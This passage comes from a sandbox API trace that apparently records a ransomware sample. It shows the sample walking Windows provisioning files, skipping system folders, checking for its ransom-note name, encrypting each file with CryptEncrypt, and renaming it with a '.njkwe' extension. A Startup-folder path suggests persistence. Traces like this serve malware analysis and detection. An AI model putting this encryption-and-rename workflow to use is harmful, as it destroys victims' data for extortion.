States)_i0$(__MVID)@WAP.provxml", lpString2="$Recycle.bin") returned 1 [0081.272] lstrcmpiW (lpString1="496__Connections_Cellular_T-Mobile USA_ TracFone (United States)_i0$(__MVID)@WAP.provxml", lpString2="System Volume Information") returned -1 [0081.272] lstrcmpiW (lpString1="496__Connections_Cellular_T-Mobile USA_ TracFone (United States)_i0$(__MVID)@WAP.provxml", lpString2="Program Files") returned -1 [0081.272] lstrcmpiW (lpString1="496__Connections_Cellular_T-Mobile USA_ TracFone (United States)_i0$(__MVID)@WAP.provxml", lpString2="Program Files (x86)") returned -1 [0081.272] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\496__Connections_Cellular_T-Mobile USA_ TracFone (United States)_i0$(__MVID)@WAP.provxml") returned 182 [0081.272] StrStrIW (lpFirst="496__Connections_Cellular_T-Mobile USA_ TracFone (United States)_i0$(__MVID)@WAP.provxml", lpSrch=".njkwe") returned 0x0 [0081.272] lstrcmpW (lpString1="496__Connections_Cellular_T-Mobile USA_ TracFone (United States)_i0$(__MVID)@WAP.provxml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0081.272] lstrcmpW (lpString1="496__Connections_Cellular_T-Mobile USA_ TracFone (United States)_i0$(__MVID)@WAP.provxml", lpString2="taridd") returned -1 [0081.272] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\496__Connecti", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0081.272] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\496__Connections_Cellular_T-Mobile USA_ TracFone (United States)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\496__connections_cellular_t-mobile usa_ tracfone (united states)_i0$(__mvid)@wap.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x43c [0081.272] GetTickCount () returned 0x1154a15 [0081.272] GetTickCount () returned 0x1154a15 [0081.272] GetTickCount () returned 0x1154a15 [0081.272] GetTickCount () returned 0x1154a15 [0081.272] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x2c, dwBufLen=0x80 | out: pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x80) returned 1 [0081.273] GetProcessHeap () returned 0xbe0000 [0081.273] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc52870 [0081.273] ReadFile (in: hFile=0x43c, lpBuffer=0xc52870, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc52870*, lpNumberOfBytesRead=0x380edc4*=0x2db, lpOverlapped=0x0) returned 1 [0081.276] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0xfffffd25, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0081.276] WriteFile (in: hFile=0x43c, lpBuffer=0xc52870*, nNumberOfBytesToWrite=0x2db, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc52870*, lpNumberOfBytesWritten=0x380edc4*=0x2db, lpOverlapped=0x0) returned 1 [0081.276] GetProcessHeap () returned 0xbe0000 [0081.276] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc52870 | out: hHeap=0xbe0000) returned 1 [0081.276] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0081.276] WriteFile (in: hFile=0x43c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380edc4*=0x300, lpOverlapped=0x0) returned 1 [0081.276] WriteFile (in: hFile=0x43c, lpBuffer=0x380ed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x380ed10*, lpNumberOfBytesWritten=0x380edc4*=0x80, lpOverlapped=0x0) returned 1 [0081.276] WriteFile (in: hFile=0x43c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380edc4*=0x4, lpOverlapped=0x0) returned 1 [0081.276] CloseHandle (hObject=0x43c) returned 1 [0081.277] GetProcessHeap () returned 0xbe0000 [0081.277] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc472e0 [0081.277] wnsprintfW (in: pszDest=0xc472e0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\496__Connections_Cellular_T-Mobile USA_ TracFone (United States)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe") returned 202 [0081.277] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\496__Connections_Cellular_T-Mobile USA_ TracFone (United States)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\496__connections_cellular_t-mobile usa_ tracfone (united states)_i0$(__mvid)@wap.provxml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\496__Connections_Cellular_T-Mobile USA_ TracFone (United States)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\496__connections_cellular_t-mobile usa_ tracfone (united states)_i0$(__mvid)@wap.provxml_r00t_{3sxle5}.njkwe")) returned 1 [0081.277] GetProcessHeap () returned 0xbe0000 [0081.277] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc472e0 | out: hHeap=0xbe0000) returned 1 [0081.277] FindNextFileW (in: hFindFile=0xc19f20, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x911c7ac2, ftCreationTime.dwHighDateTime=0x1d2e96f, ftLastAccessTime.dwLowDateTime=0x911c7ac2, ftLastAccessTime.dwHighDateTime=0x1d2e96f, ftLastWriteTime.dwLowDateTime=0x911c7ac2, ftLastWriteTime.dwHighDateTime=0x1d2e96f, nFileSizeHigh=0x0, nFileSizeLow=0x2d7, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="497__Connections_Cellular_T-Mobile USA_ IDT (United States)_i0$(__MVID)@WAP.provxml", cAlternateFileName="497__C~1.PRO")) returned 1 [0081.277] lstrcmpiW (lpString1="497__Connections_Cellular_T-Mobile USA_ IDT (United States)_i0$(__MVID)@WAP.provxml", lpString2="Windows") returned -1 [0081.278] lstrcmpiW (lpString1="497__Connections_Cellular_T-Mobile USA_ IDT (United States)_i0$(__MVID)@WAP.provxml", lpString2="$Recycle.bin") returned 1 [0081.278] lstrcmpiW (lpString1="497__Connections_Cellular_T-Mobile USA_ IDT (United States)_i0$(__MVID)@WAP.provxml", lpString2="System Volume Information") returned -1 [0081.278] lstrcmpiW (lpString1="497__Connections_Cellular_T-Mobile USA_ IDT (United States)_i0$(__MVID)@WAP.provxml", lpString2="Program Files") returned -1 [0081.278] lstrcmpiW (lpString1="497__Connections_Cellular_T-Mobile USA_ IDT (United States)_i0$(__MVID)@WAP.provxml", lpString2="Program Files (x86)") returned -1 [0081.278] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\497__Connections_Cellular_T-Mobile USA_ IDT (United States)_i0$(__MVID)@WAP.provxml") returned 177 [0081.278] StrStrIW (lpFirst="497__Connections_Cellular_T-Mobile USA_ IDT (United States)_i0$(__MVID)@WAP.provxml", lpSrch=".njkwe") returned 0x0 [0081.278] lstrcmpW (lpString1="497__Connections_Cellular_T-Mobile USA_ IDT (United States)_i0$(__MVID)@WAP.provxml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0081.278] lstrcmpW (lpString1="497__Connections_Cellular_T-Mobile USA_ IDT (United States)_i0$(__MVID)@WAP.provxml", lpString2="taridd") returned -1 [0081.278] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\497__Connecti", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0081.278] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\497__Connections_Cellular_T-Mobile USA_ IDT (United States)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\497__connections_cellular_t-mobile usa_ idt (united states)_i0$(__mvid)@wap.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x43c [0081.278] GetTickCount () returned 0x1154a15 [0081.278] GetTickCount () returned 0x1154a15 [0081.278] GetTickCount () returned 0x1154a15 [0081.278] GetTickCount () returned 0x1154a15 [0081.278] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x2c, dwBufLen=0x80 | out: pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x80) returned 1 [0081.278] GetProcessHeap () returned 0xbe0000 [0081.278] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc52870 [0081.278] ReadFile (in: hFile=0x43c, lpBuffer=0xc52870, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc52870*, lpNumberOfBytesRead=0x380edc4*=0x2d7, lpOverlapped=0x0) returned 1 [0081.284] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0xfffffd29, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0081.285] WriteFile (in: hFile=0x43c, lpBuffer=0xc52870*, nNumberOfBytesToWrite=0x2d7, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc52870*, lpNumberOfBytesWritten=0x380edc4*=0x2d7, lpOverlapped=0x0) returned 1 [0081.285] GetProcessHeap () returned 0xbe0000 [0081.285] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc52870 | out: hHeap=0xbe0000) returned 1 [0081.285] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0081.285] WriteFile (in: hFile=0x43c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380edc4*=0x300, lpOverlapped=0x0) returned 1 [0081.285] WriteFile (in: hFile=0x43c, lpBuffer=0x380ed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x380ed10*, lpNumberOfBytesWritten=0x380edc4*=0x80, lpOverlapped=0x0) returned 1 [0081.285] WriteFile (in: hFile=0x43c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380edc4*=0x4, lpOverlapped=0x0) returned 1 [0081.285] CloseHandle (hObject=0x43c) returned 1 [0081.285] GetProcessHeap () returned 0xbe0000 [0081.285] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc472e0 [0081.285] wnsprintfW (in: pszDest=0xc472e0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\497__Connections_Cellular_T-Mobile USA_ IDT (United States)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe") returned 197 [0081.285] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\497__Connections_Cellular_T-Mobile USA_ IDT (United States)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\497__connections_cellular_t-mobile usa_ idt (united states)_i0$(__mvid)@wap.provxml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\497__Connections_Cellular_T-Mobile USA_ IDT (United States)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\497__connections_cellular_t-mobile usa_ idt (united states)_i0$(__mvid)@wap.provxml_r00t_{3sxle5}.njkwe")) returned 1 [0081.286] GetProcessHeap () returned 0xbe0000 [0081.286] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc472e0 | out: hHeap=0xbe0000) returned 1 [0081.286] FindNextFileW (in: hFindFile=0xc19f20, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x911edd2d, ftCreationTime.dwHighDateTime=0x1d2e96f, ftLastAccessTime.dwLowDateTime=0x911edd2d, ftLastAccessTime.dwHighDateTime=0x1d2e96f, ftLastWriteTime.dwLowDateTime=0x911edd2d, ftLastWriteTime.dwHighDateTime=0x1d2e96f, nFileSizeHigh=0x0, nFileSizeLow=0x2d8, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="498__Connections_Cellular_T-Mobile USA_ Simple Mobile (United States)_i0$(__MVID)@WAP.provxml", cAlternateFileName="498__C~1.PRO")) returned 1 [0081.286] lstrcmpiW (lpString1="498__Connections_Cellular_T-Mobile USA_ Simple Mobile (United States)_i0$(__MVID)@WAP.provxml", lpString2="Windows") returned -1 [0081.286] lstrcmpiW (lpString1="498__Connections_Cellular_T-Mobile USA_ Simple Mobile (United States)_i0$(__MVID)@WAP.provxml", lpString2="$Recycle.bin") returned 1 [0081.286] lstrcmpiW (lpString1="498__Connections_Cellular_T-Mobile USA_ Simple Mobile (United States)_i0$(__MVID)@WAP.provxml", lpString2="System Volume Information") returned -1 [0081.286] lstrcmpiW (lpString1="498__Connections_Cellular_T-Mobile USA_ Simple Mobile (United States)_i0$(__MVID)@WAP.provxml", lpString2="Program Files") returned -1 [0081.286] lstrcmpiW (lpString1="498__Connections_Cellular_T-Mobile USA_ Simple Mobile (United States)_i0$(__MVID)@WAP.provxml", lpString2="Program Files (x86)") returned -1 [0081.286] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\498__Connections_Cellular_T-Mobile USA_ Simple Mobile (United States)_i0$(__MVID)@WAP.provxml") returned 187 [0081.286] StrStrIW (lpFirst="498__Connections_Cellular_T-Mobile USA_ Simple Mobile (United States)_i0$(__MVID)@WAP.provxml", lpSrch=".njkwe") returned 0x0 [0081.286] lstrcmpW (lpString1="498__Connections_Cellular_T-Mobile USA_ Simple Mobile (United States)_i0$(__MVID)@WAP.provxml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0081.286] lstrcmpW (lpString1="498__Connections_Cellular_T-Mobile USA_ Simple Mobile (United States)_i0$(__MVID)@WAP.provxml", lpString2="taridd") returned -1 [0081.286] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\498__Connecti", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0081.286] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\498__Connections_Cellular_T-Mobile USA_ Simple Mobile (United States)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\498__connections_cellular_t-mobile usa_ simple mobile (united states)_i0$(__mvid)@wap.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x43c [0081.287] GetTickCount () returned 0x1154a25 [0081.287] GetTickCount () returned 0x1154a25 [0081.287] GetTickCount () returned 0x1154a25 [0081.287] GetTickCount () returned 0x1154a25 [0081.287] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x2c, dwBufLen=0x80 | out: pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x80) returned 1 [0081.287] GetProcessHeap () returned 0xbe0000 [0081.287] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc52870 [0081.287] ReadFile (in: hFile=0x43c, lpBuffer=0xc52870, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc52870*, lpNumberOfBytesRead=0x380edc4*=0x2d8, lpOverlapped=0x0) returned 1 [0081.292] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0xfffffd28, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0081.292] WriteFile (in: hFile=0x43c, lpBuffer=0xc52870*, nNumberOfBytesToWrite=0x2d8, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc52870*, lpNumberOfBytesWritten=0x380edc4*=0x2d8, lpOverlapped=0x0) returned 1 [0081.292] GetProcessHeap () returned 0xbe0000 [0081.292] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc52870 | out: hHeap=0xbe0000) returned 1 [0081.292] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0081.292] WriteFile (in: hFile=0x43c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380edc4*=0x300, lpOverlapped=0x0) returned 1 [0081.293] WriteFile (in: hFile=0x43c, lpBuffer=0x380ed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x380ed10*, lpNumberOfBytesWritten=0x380edc4*=0x80, lpOverlapped=0x0) returned 1 [0081.293] WriteFile (in: hFile=0x43c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380edc4*=0x4, lpOverlapped=0x0) returned 1 [0081.293] CloseHandle (hObject=0x43c) returned 1 [0081.293] GetProcessHeap () returned 0xbe0000 [0081.293] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc472e0 [0081.293] wnsprintfW (in: pszDest=0xc472e0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\498__Connections_Cellular_T-Mobile USA_ Simple Mobile (United States)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe") returned 207 [0081.293] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\498__Connections_Cellular_T-Mobile USA_ Simple Mobile (United States)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\498__connections_cellular_t-mobile usa_ simple mobile (united states)_i0$(__mvid)@wap.provxml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\498__Connections_Cellular_T-Mobile USA_ Simple Mobile (United States)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\498__connections_cellular_t-mobile usa_ simple mobile (united states)_i0$(__mvid)@wap.provxml_r00t_{3sxle5}.njkwe")) returned 1 [0081.294] GetProcessHeap () returned 0xbe0000 [0081.294] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc472e0 | out: hHeap=0xbe0000) returned 1 [0081.294] FindNextFileW (in: hFindFile=0xc19f20, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x911edd2d, ftCreationTime.dwHighDateTime=0x1d2e96f, ftLastAccessTime.dwLowDateTime=0x911edd2d, ftLastAccessTime.dwHighDateTime=0x1d2e96f, ftLastWriteTime.dwLowDateTime=0x911edd2d, ftLastWriteTime.dwHighDateTime=0x1d2e96f, nFileSizeHigh=0x0, nFileSizeLow=0x2dd, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="499__Connections_Cellular_T-Mobile USA_ Walmart (United States)_i0$(__MVID)@WAP.provxml", cAlternateFileName="499__C~1.PRO")) returned 1 [0081.453] lstrcmpiW (lpString1="499__Connections_Cellular_T-Mobile USA_ Walmart (United States)_i0$(__MVID)@WAP.provxml", lpString2="Windows") returned -1 [0081.453] lstrcmpiW (lpString1="499__Connections_Cellular_T-Mobile USA_ Walmart (United States)_i0$(__MVID)@WAP.provxml", lpString2="$Recycle.bin") returned 1 [0081.453] lstrcmpiW (lpString1="499__Connections_Cellular_T-Mobile USA_ Walmart (United States)_i0$(__MVID)@WAP.provxml", lpString2="System Volume Information") returned -1 [0081.453] lstrcmpiW (lpString1="499__Connections_Cellular_T-Mobile USA_ Walmart (United States)_i0$(__MVID)@WAP.provxml", lpString2="Program Files") returned -1 [0081.453] lstrcmpiW (lpString1="499__Connections_Cellular_T-Mobile USA_ Walmart (United States)_i0$(__MVID)@WAP.provxml", lpString2="Program Files (x86)") returned -1 [0081.453] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\499__Connections_Cellular_T-Mobile USA_ Walmart (United States)_i0$(__MVID)@WAP.provxml") returned 181 [0081.453] StrStrIW (lpFirst="499__Connections_Cellular_T-Mobile USA_ Walmart (United States)_i0$(__MVID)@WAP.provxml", lpSrch=".njkwe") returned 0x0 [0081.453] lstrcmpW (lpString1="499__Connections_Cellular_T-Mobile USA_ Walmart (United States)_i0$(__MVID)@WAP.provxml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0081.454] lstrcmpW (lpString1="499__Connections_Cellular_T-Mobile USA_ Walmart (United States)_i0$(__MVID)@WAP.provxml", lpString2="taridd") returned -1 [0081.454] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\499__Connecti", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0081.454] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\499__Connections_Cellular_T-Mobile USA_ Walmart (United States)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\499__connections_cellular_t-mobile usa_ walmart (united states)_i0$(__mvid)@wap.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x43c [0081.454] GetTickCount () returned 0x1154ad1 [0081.454] GetTickCount () returned 0x1154ad1 [0081.455] GetTickCount () returned 0x1154ad1 [0081.455] GetTickCount () returned 0x1154ad1 [0081.455] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x2c, dwBufLen=0x80 | out: pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x80) returned 1 [0081.455] GetProcessHeap () returned 0xbe0000 [0081.455] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc53878 [0081.455] ReadFile (in: hFile=0x43c, lpBuffer=0xc53878, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc53878*, lpNumberOfBytesRead=0x380edc4*=0x2dd, lpOverlapped=0x0) returned 1 [0081.457] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0xfffffd23, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0081.457] WriteFile (in: hFile=0x43c, lpBuffer=0xc53878*, nNumberOfBytesToWrite=0x2dd, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc53878*, lpNumberOfBytesWritten=0x380edc4*=0x2dd, lpOverlapped=0x0) returned 1 [0081.458] GetProcessHeap () returned 0xbe0000 [0081.458] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc53878 | out: hHeap=0xbe0000) returned 1 [0081.458] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0081.458] WriteFile (in: hFile=0x43c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380edc4*=0x300, lpOverlapped=0x0) returned 1 [0081.458] WriteFile (in: hFile=0x43c, lpBuffer=0x380ed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x380ed10*, lpNumberOfBytesWritten=0x380edc4*=0x80, lpOverlapped=0x0) returned 1 [0081.458] WriteFile (in: hFile=0x43c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380edc4*=0x4, lpOverlapped=0x0) returned 1 [0081.458] CloseHandle (hObject=0x43c) returned 1 [0081.458] GetProcessHeap () returned 0xbe0000 [0081.458] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc472e0 [0081.458] wnsprintfW (in: pszDest=0xc472e0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: 